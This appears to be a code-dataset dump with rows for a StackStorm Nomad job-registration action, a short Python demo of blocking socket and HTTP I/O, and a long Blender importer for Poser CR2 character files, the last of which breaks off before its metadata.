hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c48fbd1f218850d00277e57bd85964c568a70eb
| 601
|
py
|
Python
|
actions/create_job.py
|
martezr/stackstorm-nomad
|
0659aef2be2e0b8247e32b85f4f37f16181c1068
|
[
"Apache-2.0"
] | 1
|
2021-12-26T15:43:51.000Z
|
2021-12-26T15:43:51.000Z
|
actions/create_job.py
|
martezr/stackstorm-nomad
|
0659aef2be2e0b8247e32b85f4f37f16181c1068
|
[
"Apache-2.0"
] | null | null | null |
actions/create_job.py
|
martezr/stackstorm-nomad
|
0659aef2be2e0b8247e32b85f4f37f16181c1068
|
[
"Apache-2.0"
] | null | null | null |
from lib import action
import nomad
class NomadParseJobAction(action.NomadBaseAction):
def run(self, file):
with open(file, "r") as nomad_job_file:
try:
job_raw_nomad = nomad_job_file.read()
job_dict = self.nomad.jobs.parse(job_raw_nomad)
output = {}
output['Job'] = job_dict
self.nomad.jobs.register_job(output)
except nomad.api.exceptions.BadRequestNomadException as err:
print(err.nomad_resp.reason)
print(err.nomad_resp.text)
return output
| 35.352941
| 72
| 0.592346
|
from lib import action
import nomad
class NomadParseJobAction(action.NomadBaseAction):
def run(self, file):
with open(file, "r") as nomad_job_file:
try:
job_raw_nomad = nomad_job_file.read()
job_dict = self.nomad.jobs.parse(job_raw_nomad)
output = {}
output['Job'] = job_dict
self.nomad.jobs.register_job(output)
except nomad.api.exceptions.BadRequestNomadException as err:
print(err.nomad_resp.reason)
print(err.nomad_resp.text)
return output
| true
| true
|
1c48fd520ee956a849f583d2d50952c3f9107b0f
| 557
|
py
|
Python
|
tornado_overview/chapter01/blockio_test.py
|
mtianyan/TornadoForum
|
5698dd5cc0e399d3d0ec53e159b8e1f1cddfbe71
|
[
"Apache-2.0"
] | 2
|
2019-02-01T00:59:19.000Z
|
2019-02-11T10:50:43.000Z
|
tornado_overview/chapter01/blockio_test.py
|
mtianyan/TornadoForum
|
5698dd5cc0e399d3d0ec53e159b8e1f1cddfbe71
|
[
"Apache-2.0"
] | null | null | null |
tornado_overview/chapter01/blockio_test.py
|
mtianyan/TornadoForum
|
5698dd5cc0e399d3d0ec53e159b8e1f1cddfbe71
|
[
"Apache-2.0"
] | 1
|
2020-10-12T06:15:17.000Z
|
2020-10-12T06:15:17.000Z
|
# 阻塞io
import socket
import requests
html = requests.get("http://www.baidu.com").text
# #1. 三次握手建立tcp连接,
# # 2. 等待服务器响应
print(html)
print("*" * 30)
# 如何通过socket直接获取html
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "www.baidu.com"
client.connect((host, 80)) # 阻塞io, 意味着这个时候cpu是空闲的
client.send("GET {} HTTP/1.1\r\nHost:{}\r\nConnection:close\r\n\r\n".format("/", host).encode("utf8"))
data = b""
while 1:
d = client.recv(1024) # 阻塞直到有數據
if d:
data += d
else:
break
data = data.decode("utf8")
print(data)
| 20.62963
| 102
| 0.648115
|
import socket
import requests
html = requests.get("http://www.baidu.com").text
print(html)
print("*" * 30)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "www.baidu.com"
client.connect((host, 80)) client.send("GET {} HTTP/1.1\r\nHost:{}\r\nConnection:close\r\n\r\n".format("/", host).encode("utf8"))
data = b""
while 1:
d = client.recv(1024) if d:
data += d
else:
break
data = data.decode("utf8")
print(data)
| true
| true
|
1c48fe605bf6854476a409dc651aff4fe759c8b0
| 46,280
|
py
|
Python
|
PCI2.py
|
jentron/Blender-PT2
|
30368229992388bb61fab51940a17e2eb114a9fd
|
[
"BSD-2-Clause"
] | 4
|
2020-07-11T12:30:30.000Z
|
2022-02-11T01:00:35.000Z
|
PCI2.py
|
jentron/Blender-PT2
|
30368229992388bb61fab51940a17e2eb114a9fd
|
[
"BSD-2-Clause"
] | 43
|
2020-03-28T19:06:51.000Z
|
2021-10-09T11:51:15.000Z
|
PCI2.py
|
jentron/Blender-PT2
|
30368229992388bb61fab51940a17e2eb114a9fd
|
[
"BSD-2-Clause"
] | 1
|
2020-05-16T06:44:57.000Z
|
2020-05-16T06:44:57.000Z
|
#=============================================================================
# Simplified BSD License, see http://www.opensource.org/licenses/
#-----------------------------------------------------------------------------
# Copyright (c) 2011-2012, HEB Ventures, LLC
# Copyright (c) 2020, 2021, Ronald Jensen
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#=============================================================================
#########################################################
#
# Character Importer 7/24/2011
#
# Data Structure:
#
# cr2.bones[].xyz (Translation)
# cr2.bones[].angles
# cr2.bones[].smoothPolys
# cr2.bones[].parent
# cr2.bones[].name
# cr2.bones[].endpoint
# cr2.bones[].origin
# cr2.bones[].orientation
# cr2.bones[].
# twist(xyz).child1 (Not sure of order)
# otheractor - (same)
# angles - ABCD
# center - xyz
# sphereMatsRaw
# posBulgeLeft - float
# posBulgeRight - float
# negBulgeLeft - float
# negBulgeRight - float
#
# joint(xyz).child1 (for all children)
# joint(xyz).child1
# taperY(?)
# smoothScaleY(?).child1 (for all children)
# (xyz)OffsetA
# scale
# scale(xyz)
# rotate(xyz)
# (xyz)OffsetB
# translate(xyz) (Some have values)
# cr2.name
#
# cr2.material
# cr2.geometry
#
#########################################################
#
# Goals:
# Load CR2
# Load morphs
# Create Character Tag for Control panel Extras
# Load only Armature / details for use as base for clothing or other props
# Store joint order as property (name) for each bone to use for translation later
#
#
#########################################################
import bpy
import time
import os
import re
# Convenience Imports:
from mathutils import *
from math import *
from bpy_extras import *
from bpy_extras.image_utils import load_image
from bpy.props import StringProperty, BoolProperty, EnumProperty
import sys
local_module_path=os.path.join(os.path.dirname(os.path.abspath(__file__)),'libs')
if local_module_path not in sys.path:
sys.path.append(local_module_path)
import PT2_open as ptl
import RuntimeFolder as Runtime
import GetStringRes
import shaderTrees as st
import shaderTreeParser as stp
import createBlenderMaterialfromP4 as cbm4
from ApplyMorph import ApplyMorph
from ReadPZMD import *
print ('\n')
print ('--- Starting Poser Character Importer Version 3 ---')
bpy.cr2count = 0 # this has a bug, it doesn't persist across saves
###########################################
#
# CR2 Class
#
###########################################
class CR2Class():
def __init__(self):
self.geompath = ''
self.morphBinaryFile = ''
self.name = ''
self.geomData = geomData()
# self.materialData = materialData()
# self.channels = channels()
self.materials = []
self.bones = []
class geomData():
def __init__(self):
self.verts = []
self.UVverts = []
self.faces = []
class materialData():
def __init__(self):
self.color = 55
self.alpha = 75
class boneData():
def __init__(self):
self.xyz = ''
self.name = ''
self.parent = ''
self.endpoint = ''
self.origin = ''
self.orientation = ''
self.angles = ''
class channels():
def __init__(self):
PBM = 'partial body morph'
xoffseta = 0
#xyz = []
# Example Fuction
def xfactor(xyz):
value=xyz*5
return(value)
###########################################
#
# Import Character Class
#
###########################################
class CharacterImport(bpy.types.Operator):
#time_start = time.time()
bl_idname = "import.poser_cr2"
bl_label = "Load Character"
filename_ext = ".CR2"
filter_glob : StringProperty(default="*.cr2;*.crz", options={'HIDDEN'})
filepath : bpy.props.StringProperty(subtype="FILE_PATH")
overwrite: BoolProperty(
name="Overwrite Materials",
description="Overwrite current materials with the same name",
default=False,
)
externalMorph: BoolProperty(
name="Load External Morphs",
description="Attempt to load external morphs if they are found",
default=True,
)
zUp: BoolProperty(
name="Fix Orientation",
description="Rotate model so Z is up",
default=True,
)
prepare: BoolProperty(
name="Prepare Model",
description="Add armature modifier to the mesh",
default=True,
)
rename: BoolProperty(
name="Rename Bones",
description="Rename bones and groups for Blender convention",
default=True,
)
pnu: EnumProperty(
name="Scale Factor",
description="",
items=(
('PNU_0', "No Scale", "Import model without scaling"),
('PNU_4', "Poser 4 Scale", "1 PNU = 8 feet (or 96 inches/2.43 meters)"),
('GEEP' , "Dr Geep Scale", "1 PNU = 8 feet 4 inches (or 100 inches/2.54 meters)"),
('PNU_6', "Poser 6+ Scale", "1 PNU = 8.6 feet (or 103.2 inches/2.62 meters)"),
),
default='GEEP'
)
def __init__(self):
self.PropArray = []
def getScaleFactor(self):
bnu = bpy.context.scene.unit_settings.scale_length
if self.pnu == 'GEEP':
scale_factor = 100 * 0.0254 / bnu
elif self.pnu == 'PNU_4':
scale_factor = 96 * 0.0254 / bnu
elif self.pnu == 'PNU_6':
scale_factor = 103.2 * 0.0254 / bnu
else:
scale_factor = 1
return(scale_factor)
def execute(self, context):
cr2 = CR2Class()
print ('\n\n')
print ('===================================================================')
print ('Scale Factor = ', self.getScaleFactor() )
#########################################
#
# Scan for multi obj's first:
# (May not be needed)
#
print ('filepath:', self.filepath)
runtime = Runtime.Runtime(self.filepath)
#runtime.print()
CharName = os.path.basename(self.filepath)[:-4] ## assuming a 3 char extension
print ('CharName:', CharName)
file = ptl.PT2_open(self.filepath, 'rt')
#data = open('/media/disk/armData.txt','w')
morphcounts = []
propcounts = []
for y in file:
x=y.strip()
##############################
#
# Create bone list
#
if x.startswith('actor ') is True:
#print (x)
tempstr = x
tempstr = tempstr.replace('actor ', '')
skipcheck = False
tempstr = ptl.namecheck01(tempstr)
#print ('actor:', tempstr)
if len(cr2.bones) > 0:
for bone in cr2.bones:
#print ('bone.name:', bone.name)
if bone.name == tempstr:
skipcheck = True
#print (skipcheck)
if skipcheck == False:
cr2.bones.append(boneData())
bonecount = len(cr2.bones)
thisbone = cr2.bones[bonecount-1]
tempstr = ptl.namecheck01(tempstr)
thisbone.name = tempstr
elif x.startswith('targetGeom ') is True:
tempstr = x
if morphcounts.__contains__(tempstr) is False:
morphcounts.append(tempstr)
elif x.startswith('prop ') is True:
tempstr = x
if propcounts.__contains__(tempstr) is False:
propcounts.append(tempstr)
##############################
#
# geompath
#
elif x.startswith('figureResFile ') is True:
# print (x)
tempstr = x.replace(r'figureResFile ', '')
cr2.geompath = tempstr.strip('"')
# print ('GeomFile:', cr2.geompath)
elif x.startswith('morphBinaryFile ') is True:
tempstr = x.replace('morphBinaryFile ', '')
cr2.morphBinaryFile = runtime.find_runtime_path( tempstr.strip('"') )
print ('External Morph File:', cr2.morphBinaryFile)
file.close()
print ('Number of Morphs:', len(morphcounts))
print ('Number of Props:', len(propcounts))
#print ('=======')
#for bone in cr2.bones:
# print (bone.name)
#print ('-------------')
print ('=======')
for prop in propcounts:
print (prop)
print ('-------------')
depth = 0 # count of open braces
# blacklist is a list of top-level sections we are not interested in right now
blacklist = ['baseProp', 'controlProp', 'hairGrowthGroup', 'magnetDeformerProp',
'setGeomHandlerOffset', 'sphereZoneProp', 'prop', 'alternateGeom']
current_mat = 'No Mat'
raw_mats = [] # an array of the unparsed materials
mat_name = ''
mats = {}
comps = [] # a list of the material unparsed lines
readcomps = False
mat_depth = 0
morphs = []
morph = Morph()
morphloop = -1
current_morph = ''
mtrx_swap = Matrix((( 1, 0, 0, 0),
( 0, 1, 0, 0),
( 0, 0, 1, 0),
( 0, 0, 0, 1)) )
###############################
#
# Re-open file
#
file = ptl.PT2_open(self.filepath, 'rt')
figureCheck = False
currentActor='' # in Poser an 'actor' is a vertex group or bone
# start of parser loop
for y in file: #file is already an iterable
x = y.strip() # do we .strip() here instead of at every level below?
try:
(keyword, args) = x.split(maxsplit=1)
except ValueError: # the value error should mean there are no args on this line
keyword = x
if keyword in blacklist and depth == 1:
while True: # iterate through the file until the section ends
x=next(file).strip()
if x.startswith('{'):
depth += 1
elif x.startswith('}'):
depth -= 1
if depth < 2:
break
elif keyword == 'actor':
currentActor = ptl.namecheck01(args)
for bone in cr2.bones:
if bone.name == currentActor:
currentbone = bone
outstr = str(currentbone.name) + ':'
#data.write(outstr)
###############################################
elif keyword == 'angles':
currentbone.angles = args
elif keyword == 'origin':
currentbone.origin = args
elif keyword == 'endPoint':
currentbone.endpoint = args
# there are parent, inkyParent, and nonInkyParent.
# I have seen all three on the same bone, or just inky and nonInky or just parent
elif keyword == 'parent'or keyword == 'nonInkyParent':
currentbone.parent = ptl.namecheck01(args)
elif keyword == 'orientation':
currentbone.orientation = args
elif x.startswith('twistX twistx'):
tempstr = x.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
elif x.startswith('twistY twisty'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('twistZ twistz'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointX jointx'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointY jointy'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif x.startswith('jointZ jointz'):
tempstr = x
#print ('currentbone:', currentbone.name)
#print ('adding:', tempstr)
tempstr = tempstr.replace(' ', '_')
currentbone.xyz = currentbone.xyz + tempstr + ' '
elif keyword == 'figure' and figureCheck == False:
figureCheck = True
#print ('========= Figure check True !! ===============')
elif keyword == 'name' and figureCheck == True:
if not args.startswith('Figure'):
CharName = args
figureCheck = False
##########################################################
# Morph Targets.
#
elif keyword == 'targetGeom':
morph.name = args
morphloop = depth
morph.group = currentActor
elif keyword == 'k' and depth >= morphloop:
morph.value = float(x.split()[2])
elif keyword == 'min' and depth >= morphloop:
morph.min = float(x.split()[1])
elif keyword == 'max' and depth >= morphloop:
morph.max = float(x.split()[1])
elif keyword == 'trackingScale' and depth >= morphloop:
morph.trackingScale = float(x.split()[1])
elif keyword == 'd' and depth >= morphloop:
i, dx, dy, dz = [float(s) for s in args.split()]
morph.deltas.append( { int(i) : Vector( (dx, dy, dz) ) } )
elif keyword == 'indexes' and depth >= morphloop:
morph.indexes = float(args)
elif keyword == 'numbDeltas' and depth >= morphloop:
morph.numbDeltas = float(args)
elif keyword == '{':
depth += 1
# print('Depth++: ', depth, morphloop, matloop)
elif keyword == '}':
depth -= 1
if morphloop >= depth:
# morph.print()
morphloop = -1
morphs.append(morph)
morph = Morph()
# print('Depth--: ', depth, morphloop, matloop)
##########################################################
# Build material array
#
elif keyword == 'material':
#print ('Mat:', line.replace('material', ''))
readcomps = True # Turn on component reader
mat_name = args
print ('Mat Name:', mat_name)
while readcomps:
line = next(file).strip()
if line.startswith('{') is True and readcomps is True:
mat_depth += 1
elif line.startswith('}') is True and mat_depth > 0:
mat_depth -= 1
comps.append([mat_depth, line.split()])
# print(mat_depth, line)
if mat_depth == 0 and readcomps is True:
readcomps=False
raw_mats.append([mat_name, comps])
mat_name = ''
comps = []
# end of parser loop
#data.close()
file.close()
bpy.cr2count = bpy.cr2count + 1
###########################################
#
# Create Armature
#
###########################################
# CharName not working, reset to default:
#CharName = 'Body'
cr2.name = CharName + str(bpy.cr2count)
print ('\nCharacter:', cr2.name)
print ('=======================================')
print (bpy.context.mode)
if bpy.context.mode != 'OBJECT':
# bpy.ops.object.editmode_toggle()
bpy.ops.object.mode_set(mode='OBJECT')
print ("Creating Armature 3")
arm = bpy.data.armatures.new(cr2.name)
object_utils.object_data_add(context, arm, operator=None)
bpy.context.view_layer.update()
arm = bpy.context.active_object
arm.location.x = 0
arm.location.y = 0
arm.location.z = 0
arm.data.display_type = 'STICK'
arm.show_in_front = True
print (arm)
arm.name = cr2.name
armdata = arm.data
armdata.name = "Arm_data_"+cr2.name
if bpy.context.mode != 'EDIT_MODE':
bpy.ops.object.mode_set(mode='EDIT')
#print ('Object Name:', arm.name)
#print ('Armature Name:', armdata.name)
bones = armdata.edit_bones
for bone in cr2.bones:
#print (bone.name)
# if bone.name.startswith('BODY'):
# pass
if bone.origin == '':
pass
elif bone.name.startswith('bodyMorphs'):
pass
else:
ebone = bones.new(bone.name)
ebone.head = [float(s) for s in bone.origin.split()]
#array = [float(s) for s in string.split()]
ebone.tail = [float(s) for s in bone.endpoint.split()]
#ebone.parent = bone.parent
ebone.head_radius = 0.02
ebone.tail_radius = 0.02
ebone.envelope_distance = 0.05
pass
#####################################
#
# Add xyz joint order property here:
#
#####################################
xyzprop = bone.xyz.split()
xyz = ''
if len(xyzprop) > 2:
if xyzprop[0].__contains__('X'):
xyzprop[0] = 'X'
if xyzprop[1].__contains__('X'):
xyzprop[1] = 'X'
if xyzprop[2].__contains__('X'):
xyzprop[2] = 'X'
if xyzprop[0].__contains__('Y'):
xyzprop[0] = 'Y'
if xyzprop[1].__contains__('Y'):
xyzprop[1] = 'Y'
if xyzprop[2].__contains__('Y'):
xyzprop[2] = 'Y'
if xyzprop[0].__contains__('Z'):
xyzprop[0] = 'Z'
if xyzprop[1].__contains__('Z'):
xyzprop[1] = 'Z'
if xyzprop[2].__contains__('Z'):
xyzprop[2] = 'Z'
xyz = xyzprop[0] + xyzprop[1] + xyzprop[2]
bone = ebone
#print (bone)
bone["joint order"] = xyz
#####################################
#
# Set Bone Roll:
# Negate the Z-axis
#
#####################################
try:
#print ('joint order:', str(xyz)[1])
bonerollaxis = bone["joint order"][1]
flip = False
if bonerollaxis == 'Z':
flip = True
ebone.select = True
#bpy.ops.armature.calculate_roll(type=bonerollaxis, axis_flip=flip)
bpy.ops.armature.calculate_roll(type=bonerollaxis)
#print ('rolling bone to:', bonerollaxis)
ebone.select = False
except:
pass
###########################################
#
# Set bone parents
#
###########################################
print ('\n------- parenting bones ------------')
for bone in cr2.bones:
try:
#print (bone.name)
child = bones.get(bone.name)
parent = bones.get(bone.parent)
child.parent = parent
except:
pass
###########################################
#
# Copy Joint Order to pose bones
#
###########################################
bpy.ops.object.mode_set(mode='EDIT')
arm = bpy.context.active_object
bones = arm.data.edit_bones
temp = []
xyza = []
for bone in bones:
temp = [bone.name, bone["joint order"]]
xyza.append(temp)
temp = []
bpy.ops.object.mode_set(mode='POSE')
pbones = arm.pose.bones
for value in xyza:
if value[1] != '':
pbones[value[0]]["joint order"] = value[1]
for bone in pbones:
bone["bend"] = 1
bone["side"] = 1
bone["twist"] = 1
###########################################
#
# Read Geometry
#
###########################################
print ('\n\n')
print ('==================================================================')
print ('=')
print ('= Creating Mesh ')
print ('=')
print ('==================================================================')
###########################################
#
# Get Geom file path
#
###########################################
char = bpy.context.active_object
char['GeomPath'] = cr2.geompath
print (self.filepath)
print ('geompath:', cr2.geompath)
fullgeompath=runtime.find_runtime_path(cr2.geompath)
print(fullgeompath)
###########################################
#
# Open File
#
###########################################
# Or internal Mesh?
vertcount = 0
facecount = 0
facearray = []
UVvertices = []
verts = []
current_group = ''
file3 = ptl.PT2_open(fullgeompath, 'rt')
#print ('Pre-655 check')
#linecount = 1
for temp in file3:
#print ('line:', linecount, 'temp:', temp)
#linecount += 1
temparray2 = []
###########################################
#
# Create Vert List
#
###########################################
if temp.startswith('v '):
vert = temp.split()
vert.remove('v')
vert = [float(i) for i in vert]
vert = tuple(vert)
cr2.geomData.verts.append(vert)
###########################################
#
# Create Face List w/ Mats
# And vert group
#
###########################################
elif temp.startswith('old_f '):
face = temp.split()
face.remove('f')
tempface = []
for vert in face:
vert2 = vert.split('/')
#print (vert2)
tempface.append(int(vert2[0])-1)
if len(tempface) > 4:
print ('Fgon Warning!!')
print (tempface)
else:
cr2.geomData.faces.append(tempface)
elif temp.startswith('f ') is True:
tempstr1 = current_mat
tempstr2 = temp.lstrip('f ')
tempstr3 = current_group
facearray.append([tempstr1, tempstr2, tempstr3])
#print (tempstr1, tempstr2, tempstr3)
###########################################
#
# Create UV Vert list
#
###########################################
elif temp.startswith('old_vt '):
uvvert = temp.split()
uvvert.remove('vt')
uvvert = [float(i) for i in uvvert]
cr2.geomData.UVverts.append(uvvert)
elif temp.startswith('vt ') is True:
tempstr = temp.lstrip('vt ')
#print (tempstr)
temparray1 = [float(s) for s in tempstr.split()]
temparray2.append(temparray1[0])
temparray2.append(temparray1[1])
UVvertices.append(temparray2)
#print ('UVvertices:', temparray2)
elif temp.startswith('usemtl ') is True:
current_mat = temp.split()[1]
elif temp.startswith('g ') is True:
try:
tempstr = temp.split()[1]
except IndexError:
tempstr = 'Null' # there is no group name
current_group = tempstr
#print ('Current group:', current_group)
###########################################
#
# Creat Mesh
#
###########################################
print (facearray[1])
mesh = bpy.data.meshes.new(cr2.name+':Mesh')
#mesh = bpy.data.meshes.new()
ob = bpy.data.objects.new(cr2.name+':Object', mesh)
ob.data['morphFile']=cr2.morphBinaryFile
#ob = bpy.data.objects.new('Body', mesh)
scn = bpy.context.scene #C = bpy.context, D = bpy.data
# scn.objects.link(ob) D.collections['Collection 1'].objects.link(D.objects['MeshObject'])
# scn.objects.active = ob
# scn.update()
bpy.context.view_layer.active_layer_collection.collection.objects.link(ob)
mesh.from_pydata(cr2.geomData.verts, [], cr2.geomData.faces)
mesh.update(calc_edges=True)
facecount = 0
extrafaces = []
extrafacecount = 1
print ('-----------------------------------')
textureverts = []
faces = []
face_mat = []
textureverts = []
#
# Vert group data file
#
#
#vertfile = open('k:\\vertgroup.txt', 'w')
for face in facearray:
TempTextureVerts = []
temparray = []
facemat = face[0] #mat this face is assigned to
vertlist = face[1] # list of all verts in face: 30/1/4 32/2/9
eachvert = vertlist.split() # equals ['30/1/4', '32/2/9', ...]
#print ('eachvert:', eachvert)
geomface = []
for y in eachvert:
splitverts = y.split('/') # equals ['30', '1', '4']
geomface.append(splitverts[0]) # adds first vert index to geom face vert list
if len(splitverts) > 1:
TempTextureVerts.append(splitverts[1])
# I have encountered files in the wild with some unmapped faces
# so set them to zero so the indexes match
else:
TempTextureVerts.append(0)
for vert in geomface:
temparray.append(int(vert)-1)
##########################################################################
#
# Must deal with face and UV face together to match up texture map
#
if len(temparray) < 5:
faces.append(temparray) # list of vert indices [1,2,3,4]
temp_mat_array = [facecount, facemat] # face index, mat name
face_mat.append(temp_mat_array) # add face# and mat name to list
textureverts.append(TempTextureVerts)# add texture verts to list
facecount = facecount + 1
else:
y = len(temparray)
faces.append([temparray[0], temparray[1], temparray[2]])# adds the first face
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[1], TempTextureVerts[2]]) # Add matching UV face
temp_mat_array = [facecount, facemat] # face index, mat name
face_mat.append(temp_mat_array) # add face# and mat name to list
facecount = facecount + 1
for q in range(2,y-1):
# Creates triangles out of remaining vertex list
faces.append([temparray[0], temparray[q], temparray[q+1]])
if len(TempTextureVerts) > 0:
textureverts.append([TempTextureVerts[0], TempTextureVerts[q], TempTextureVerts[q+1]]) # Add matching UV face
temp_mat_array = [facecount, facemat] # face index, mat name
face_mat.append(temp_mat_array) # add face# and mat name to list
facecount = facecount + 1
###########################################
#
# Creat Vert Groups
#
###########################################
# face = (Mat, vertlist, group name)
# ob = object
#print (ob.vertex_groups)
#################################
#
# Create VGroup if not already
#
#################################
#ob = bpy.context.object
vg = ob.vertex_groups
#groupname = 'lEye'
groupname = face[2]
g_exists = False
if len(vg) > 0:
for g in vg:
#print (g.name)
if g.name == groupname:
g_exists = True
if g_exists == True:
pass
else:
vg.new(name=groupname)
#################################
#
# Add Vert to Group
# vg.add(index, weight, type)
#
#################################
for y in eachvert:
splitverts = y.split('/') # equals ['30', '1', '4']
#geomface.append(splitverts[0]) # adds first vert index to geom face vert list
#print (vg[0])
'''
for vert in splitverts:
if groupname == 'lHindToes' and int(vert) < 100:
print ('Group:', groupname, ' vert:', vert)
vg[groupname].add([int(vert)], 1, 'ADD')
outstr = groupname + ' ' + str(vert) + '\n'
vertfile.write(outstr)
'''
vg[groupname].add([int(splitverts[0])-1], 1, 'ADD')
#outstr = groupname + ' ' + str(int(splitverts[0])-1) + '\n'
#vertfile.write(outstr)
#vg.add(vertnum, 1, 'ADD')
mesh.from_pydata(verts, [], faces)
mesh.update()
#vertfile.close()
###########################################
#
# Creat UV Map
#
###########################################
facecount = 0
longfaces = []
if( len(UVvertices) > 0 ):
#mesh.uv_textures.new()
uvlayer = mesh.uv_layers.new()
if uvlayer:
mesh.uv_layers.active = uvlayer
facecount = 0
longfaces = []
#print ('Len of textureverts:', len(textureverts))
#print(textureverts[0])
#print(UVvertices[0])
for face in mesh.polygons:
k=0
for vert_idx, loop_idx in zip(face.vertices, face.loop_indices):
textureindex = int(textureverts[face.index][k])-1
mesh.uv_layers.active.data[loop_idx].uv = UVvertices[textureindex]
k+=1
#for face in cr2.geomData.faces:
# print (face)
##########################################################################
#
# Morphs
#
print ('\n')
print ('==================================================')
print ('= Creating Shapekeys =')
print ('==================================================')
# print ('Number of Morphs:', len(morphs))
for morph in morphs:
ApplyMorph(ob, morph, mtrx_swap=mtrx_swap )
# print ("Morph:", morph.name, "Size:", len(morph.deltas) )
doMaterials = True
if doMaterials:
##########################################################################
#
# Materials
#
print ('==================================================')
print ('= Creating Materials =')
print ('==================================================')
time_start = time.time()
# the name that comes back from createBlenderMaterial
# may not be the name we asked for so we'll make a mapping
mat_name_map = {}
bpy.PT2_raw_mats = raw_mats
bpy.PT2_mats={} # save the parsed array into the bpy for future use
for raw_mat in raw_mats: # raw_mat[0] contains material name
bpy.PT2_mats[raw_mat[0]] = stp.parseMaterial( iter(raw_mat[1]), raw_mat[0] )
# print(raw_mat[0], type(bpy.PT2_mats[raw_mat[0]]))
mat1 = cbm4.createBlenderMaterialfromP4(raw_mat[0], bpy.PT2_mats[raw_mat[0]], runtime, overwrite=self.overwrite)
mat_name_map[mat1.name] = raw_mat[0]
####################################################################################################################
if mesh.materials.__contains__(raw_mat[0]):
#print ('True')
skip = 1
else:
mesh.materials.append(mat1)
skip = 1
#print ('False')
#############################################################
#
# Assign faces to materials
#
#print ('\n')
#print ('==================================================')
#print ('= Assigning Faces to Materials =')
#print ('==================================================')
#print ('len of face_mat:', len(face_mat))
for face in face_mat:
#print (face)
mat_count = 0
for mat in mesh.materials:
skip = 1
if mat_name_map[mat.name] == face[1]:
mesh.polygons[face[0]].material_index = mat_count
mat_count = mat_count + 1
##########################################################
##########################################################
print ('Time to create Materials:', time.time()-time_start)
#print ('\n\n')
#print ('Len of verts:', len(cr2.geomData.verts))
#print ('Sample Vert:', cr2.geomData.verts[0])
#print ('Len of faces:', len(cr2.geomData.faces))
#print ('sample face:', cr2.geomData.faces[0])
#try:
# print ('Len of UVVerts:', len(cr2.geomData.UVverts))
# print ('sample UVvert:', cr2.geomData.UVverts[0])
#except:
# pass
bpy.ops.object.mode_set(mode='OBJECT')
print ('=========================================================\n\n')
###########################################
#
# Clear Variables / prevents multiple mesh contamination
#
###########################################
cr2.geomData.faces = []
cr2.geomData.verts = []
cr2.geomData.UVverts = []
###########################################
#
# Create Materials
#
###########################################
###########################################
#
# Apply mats to Geometry
#
###########################################
##############################################
#
# Results:
#
##############################################
print ('Results:')
print ('geompath:', cr2.geompath)
print ('morphPath:', cr2.morphBinaryFile)
#print ('gemodata.verts:', cr2.geomData.verts)
#for bone in cr2.bones:
#print ('--------------------------')
#print ('bone name:', bone.name)
